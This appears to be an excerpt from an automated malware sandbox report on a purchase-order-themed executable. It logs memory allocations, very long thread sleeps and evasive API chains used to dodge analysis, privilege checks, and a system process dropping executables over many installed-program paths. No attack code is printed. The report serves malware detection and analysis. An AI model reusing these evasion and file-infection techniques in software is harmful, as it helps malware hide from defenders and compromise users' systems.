                          Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_00B152A0
                          Source: C:\Windows\System32\FXSSVC.exeCode function: 20_2_00C952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_00C952A0
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 26_2_008952A0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_00CD52A0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 11F0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 9BF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: AE30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: BE30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 3660000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 39A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMemory allocated: 38A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 1320000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 3010000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 5010000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 9780000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: A780000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: A9A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: B9A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2B30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D10000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4D10000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 6400000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2E400000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2450000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2510000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 4510000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 34E0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 36E0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMemory allocated: 56E0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2E40000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2FF0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 4FF0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4794Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4532Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2303
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 984
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_8-21794
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_8-22132
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_26-5758
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_27-5727
                          Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_20-5706
                          Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-5631
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_34-22527
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeAPI coverage: 9.2 %
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe TID: 7732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 4794 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 325 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe TID: 7208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 1860Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\alg.exe TID: 7384Thread sleep time: -270000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1908Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep count: 2303 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8028Thread sleep time: -90000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8044Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
